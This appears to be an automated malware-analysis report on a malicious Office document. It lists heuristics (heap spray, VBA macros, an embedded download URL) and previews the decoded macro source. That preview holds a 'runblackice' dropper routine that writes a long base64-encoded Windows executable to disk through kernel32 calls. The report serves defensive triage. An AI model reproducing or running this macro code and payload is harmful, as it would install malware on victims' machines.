MALICIOUS
64
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Office document containing VBA macros. The macros appear to be obfuscated and attempt to download and execute a second-stage payload from the embedded URL http://www.wordwendang.com. The heap spray heuristic suggests exploitation of a memory corruption vulnerability.
Heuristics 4
-
Heap-spray pattern detected high SC_HEAP_SPRAYRepeated 0x41 (A) bytes found
Disassembly
Attempted x86 opcode disassembly0000B427 41 inc ecx 0000B428 41 inc ecx 0000B429 41 inc ecx 0000B42A 41 inc ecx 0000B42B 41 inc ecx 0000B42C 41 inc ecx 0000B42D 41 inc ecx 0000B42E 41 inc ecx 0000B42F 41 inc ecx 0000B430 41 inc ecx 0000B431 41 inc ecx 0000B432 41 inc ecx 0000B433 41 inc ecx 0000B434 41 inc ecx 0000B435 41 inc ecx 0000B436 41 inc ecx 0000B437 41 inc ecx 0000B438 41 inc ecx 0000B439 41 inc ecx 0000B43A 41 inc ecx 0000B43B 41 inc ecx 0000B43C 41 inc ecx 0000B43D 41 inc ecx 0000B43E 41 inc ecx 0000B43F 41 inc ecx 0000B440 41 inc ecx 0000B441 41 inc ecx 0000B442 41 inc ecx 0000B443 41 inc ecx 0000B444 41 inc ecx 0000B445 41 inc ecx 0000B446 41 inc ecx 0000B447 41 inc ecx 0000B448 41 inc ecx 0000B449 41 inc ecx 0000B44A 41 inc ecx 0000B44B 41 inc ecx 0000B44C 41 inc ecx 0000B44D 41 inc ecx 0000B44E 41 inc ecx 0000B44F 41 inc ecx 0000B450 41 inc ecx 0000B451 41 inc ecx 0000B452 41 inc ecx 0000B453 41 inc ecx 0000B454 41 inc ecx 0000B455 41 inc ecx 0000B456 41 inc ecx 0000B457 41 inc ecx 0000B458 41 inc ecx 0000B459 41 inc ecx 0000B45A 41 inc ecx 0000B45B 41 inc ecx 0000B45C 41 inc ecx 0000B45D 41 inc ecx 0000B45E 41 inc ecx 0000B45F 41 inc ecx 0000B460 41 inc ecx 0000B461 41 inc ecx 0000B462 41 inc ecx 0000B463 41 inc ecx 0000B464 41 inc ecx 0000B465 41 inc ecx 0000B466 41 inc ecx 0000B467 41 inc ecx 0000B468 41 inc ecx 0000B469 41 inc ecx 0000B46A 41 inc ecx 0000B46B 41 inc ecx 0000B46C 41 inc ecx 0000B46D 41 inc ecx 0000B46E 41 inc ecx 0000B46F 41 inc ecx 0000B470 41 inc ecx 0000B471 41 inc ecx 0000B472 41 inc ecx 0000B473 41 inc ecx 0000B474 41 inc ecx 0000B475 41 inc ecx 0000B476 41 inc ecx 0000B477 41 inc ecx 0000B478 41 inc ecx 0000B479 41 inc ecx 0000B47A 41 inc ecx 0000B47B 41 inc ecx 0000B47C 41 inc ecx 0000B47D 41 inc ecx 0000B47E 41 inc ecx 0000B47F 41 inc ecx 0000B480 41 inc ecx 0000B481 41 inc ecx 0000B482 41 inc ecx 0000B483 41 inc ecx 0000B484 41 inc ecx 0000B485 41 inc ecx 0000B486 41 inc ecx
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.wordwendang.com In document text (OLE body)
- http://www.wordwendang.com/templets/images/toplogo.gifIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9486 bytes |
SHA-256: acb34cc2552147e7ddb95089b61c89c94e3845fcb67bcb3948eb770f1b049a0f |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 15 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True '<!!blackice> Private Const base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long Private Declare Function GetTempPath Lib "kernel32" Alias "GetTempPathA" (ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long Private Declare Function GetTempFileName Lib "kernel32" Alias "GetTempFileNameA" (ByVal lpPathName As String, ByVal lpPrefixString As String, ByVal uUnique As Long, ByVal lpTempFileName As String) As Long Private Sub runblackice() On Error Resume Next filestring = "TVoAAAAAAAAAAAAAUEUAAEwBAgBGU0chAAAAAAAAAADgAA8BCwEAAADgAAAAsAAAAAAAAFQBAAAAEAAADAAAAAAAQAAAEAAAAAIAAAQAAAAAAAAABAAAAAAAAAAAUAIAAAIAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAADAQQIAhAAAAACwAQBcDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAQAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAADgAADAAAAAAAAAAAAAoAAAALABAEGSAAAAAgAAAAAAAAAAAAAAAAAA4AAAwIclBEJCAGGUVaS2gP8Tc/kzyf8TcxYzwP8Tcx+2gEGwEP8TEsBz+nU6quvg" filestring = filestring + "/1MIAvaD2QF1Dv9TBOskrNHodC0TyesYkUjB4Ais/1MEO0P4cwqA/AVzBoP4f3cCQUGVi8W2AFaL9yvw86Re659erZetUP9TEJWLB0B483UD/2MMUFX/UxSr6+4zyUH/ExPJ/xNy+MMC0nUFihZGEtLDS0VSTkVMMzIuZGxsAAAAAAAAAAAAAAAAAAAAAAIAAwAAACAAAIAOAAAAOAAAgAAAAAAAAAAAAAAAAAAAAQABAAAAUAAAgAAAAAAAAAAAAAAAAAAAAQBlAAAAaAAAgAAAAAAAAAAAAAAAAAAAAQAECAAAgAAAAAAAAAAAAAAAAAAAAAAAAQAECAAAkAAAAKCwAQCoDAAAAAAAAAAAAABIvQEAFAAAAAAAAAAAAAAAKAAAACAAAABAAAAAAQAYAAAAAACADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" filestring = filestring + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAz" filestring = filestring + "MwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAzMwAAAACZmWbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzAAzMwCZmfj4+JnM/5n//5nM/5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//5nM/5n//5n//5nM/5nM/5n//5nM/5n//5nM/5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5nM/5n//5nM/5n//5nM/5nM/5n//5n//5nM/5nM/5nM/5n//5nM/5nM/5nM/5nM/2bMzAAzMwCZmfj4+JnM/5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//5n//5nM/5n//5nM/5n/" filestring = filestring + "/5n//5nM/5nM/5nM/5n//5nM/5nM/5nM/5nM/5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5nM/5nM/5n//5nM/5n//5n//5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5n//5nM/5nM/5n//5nM/5nM/5n//5n//5n//5nM/5nM/5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5nM/5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5n//5n//5n//5nM/5nM/5nM/5nM/5n//5nM/5nM/5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5nM/5n/" filestring = filestring + "/5nM/5nM/5n//5nM/5nM/5n//5nM/5nM/5n//5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5n//5n//5nM/5nM/5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5nM/5n//5nM/5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5nM/5nM/5n//5nM/5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5n//5n//5n//5n//5n/" filestring = filestring + "/5n//5nM/5n//5nM/5n//5n//5nM/5nM/5n//5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5n//5nM/5n//5n//5nM/5n//5n//5nM/5n//5n//5n//5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5n//5n//5nM/5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5n/" filestring = filestring + "/5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//5n//5n//5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5n//5nM/5nM/5n//5n//5n//2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5nM/5n//5nM/5n//5nM/5n//5n//5n//5nM/5n//5n//5n//5nM/5n//5nM/2bMzAAzMwCZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n/" filestring = filestring + "/5n//5n//5nM/5n//5n//5nM/5n//5n//5n//5nM/5n//2bMzAgICACZmfj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+Pj4+AAAAAAAAACZmWbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzGbMzACZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQAAAAAAAAAAAACZmfD7/5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//5n//wCZmQgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//5n//5n//wCZmQgICAAAAAAAAAAA" filestring = filestring + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACZmfj4+Jn//5n//5n//5n//5n//5n//5n//5n//wCZmQgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQCZmQgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////////////////////+AAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" filestring = filestring + "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAA4AAf//AAP//4AH///AD////////AAABAAEAICAAAAEAGACoDAAAAQBVHIvsg4EwjUUcic3c5H0Q4HV/CAfI/+kzAQ4Dx0XkQAoH6IxG7CPwBvz9/wIHjU34UWgGBCA9agGPVRRSY1DyQICLRRDmCOv7r+H/URSQqOBz4c9jIBLp32BxEBiDwAF9wQYEUOgwex74xPOHRtSLTT7c2fSm2EFa6wm8eIaDwgGJDN5aWDtgfTLQQJobwRBGtjTPEuo7L2GDKvQDyOwCiX8BZkKIQR7sCNgMzlIM+FHm60W9m7DsRyBq5IDS4gQKhdJ0DbyRASCNxTroahC0jgpNDFG4BuRSZmAoCFDI6QRkwlHWwW26EtfI/1AYpcYRBRnrHIzcwi1Cubq30CQ6yghbem09/OVdScNROYEUoAFoMIiqwBBB4P82FSitjEG4zgpg" filestring = filestring + "YzAFEkFNmAw9YDVqUQSLAYeIUpBQNPMKuv5IYukGzFVm6KhJA3QosHmirgSaxASoiZNlrKpQSQmw7UiQGbQkDIcNaOTjA4qY5UPgBOgfQIeaJKpTAd4PhbZI/01Q6NUVNFDx8RzvGBFdVZhQUqzozmQChe/9CjAUg1AF6UmG3GTC8IJHvISh6FA3yCBDRbz1GUxvuB4yEaS8RD3rEAjpQcqHajU8SBSFlWBPk1LdMnzwkqOnHJCYDGgso43jQBxR6MpIeU+KCEVw6xOSxoGlhUUhCnCZIUjJ2TgeISZQuQOORoSbBd00VmONGGYvavxU5tEo4VERRCBQyg4UGKRMivxSujvA/66thTYqpCrACINl5LtUSS7IOarACeIZyAzMjCFMERKEY0UDoXP8IqyQRUJ8yByjxr0iAkFFzZxb/SFYkJyhKfwfeEcCIfjJJE4BK4pspGT4KM9M+1DkSFpcRFUc1KB8QpHIiEFNoFFEb0SRmPt8IKXIENDkPJHU0DiR" filestring = filestring + "VfwCkUoPcCBC+QfFDG4cYs5ooEYHQtCKInaQNOGlATeKcITiZED/UYoEv1LPiiGsFIUcSGkQoHbfjMB1emOKOqNMOLE9JDXxVQHiUgrKpKYf/HdaemuRDNJyMtQsQlCZMkTcI8xATOERyy6sk9bdCOFRPkHxDEwc1IRD2CHckeBE/byEKU3QkwIB6Cf6lPvJTKSVTCoBSNTXxZxQRC36+SMUc3vdt3JMUklToEcMWMT4J1jEnCdYxIQnWEoZu2gDv/SSTULgWPVGoyqEdlkktEzmnWEAM8DrG+l13ZFUcAUidznrgTqLO5U8nz2dJZsUXSLkAiyFSLZHaPQRomCGhXAlKIO9BrtmCMkGuLV4I85pKJU5u2yhNOuwcpMGhLEWrnU8NWg5y3hM99NFLZVkEwhKMI0gJjNClWyoEulCEBIihXjuV1gEACz4N8huS4eKdZmF+OyOwCgsMEKVSbwh7Atm+DIyNqCQhXP2lEx7iRz9N8Ij9EJEEhAc/YQhfnSu" filestring = filestring + "QB1NbI4UlRUIUuhZzdczsp6RElYrTLUh7Arj94N2RXFD0vQpLoTMRSkPiZiRQ19ipsTwRFpDgEEG4A+VJsCItAbrBMYKVgH5lyR/JDbeSnOA4FCFQ4VYXJmaJFErPUs0RXTm2lMahYg3aVaNQiNRzlkohZA6CVXYgeISynALSWbNyIjkjCiQhRCUsmQZhAkJvHAGyUn2z6UsGlVPBDEWlUS/Iy6RKWJocL4+/QwUhUQVaQ6f8ngZRA8hKvCyA4q6Os8RJAnZiAxEh4ja9XYjYAORfE0niAGp4MuarmZIuLFYjTHIShCFyEIQjchKRJwhlXxiAdDFEGX17OZFAjzXGo0gIymgxZOSuDIIIBaUACG48J4Ck2mRdFxLJiUUYMAPhNGtvqHSyMh1IfDWEAJo0Mt0HvEldfQasj6tS+xssyRY/vHo3IYhJP4J7W9ls5CqkMe0o7bohUhcHdKCuY2JCkW85NxRJ0oov+SMnuNJQQOFIwIgQUOVIFFDhUooy9yE" filestring = filestring + "Q+Ah5JHoieyZg3RpYJIEDFnzjxxknFzLw9Qy4rDMeCUEEx6DCQHoFfOeDYRd7VejisBpQs1CURsSxCx8jvELI0S8QsiE7xHZ9RAIjYRDURGb8qGVeAgCpiGU9WEl6WsIZoRFYf1uQgV7KUH9idGZ2Zfhp+mlLf+UPAJEVle5EKPmvhwB1Y19vPOlpCmIGXwPDUD9CXzMAIpEBbzrArAVPV9eNck0UdwZDzoMMCRJhr56EhALxvTkzJAV+83weGN2mA3JJvhThzASg8AD30rzPBDL6cs5t/EPje58+ZlUAnkMOU2WgeEhPMHp/YPkP1En6F+sAq4PM77QjuAVfOQlHXpzBjboAllMVggvHwQLRYPgPwqILjFZ3BZSUwg0IQREECgGjiH6/sTsMhA5AhRII9dRyEfV2AXcweKkJgtnwqLss+EQZJAm6AoYEBL8sT4wS4P0BN2YoP1H75vE/HnwJMEDEJTpbGNA+DuaEIL6HQEqMRwr/+RG2IIk0BMkDtQr" |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.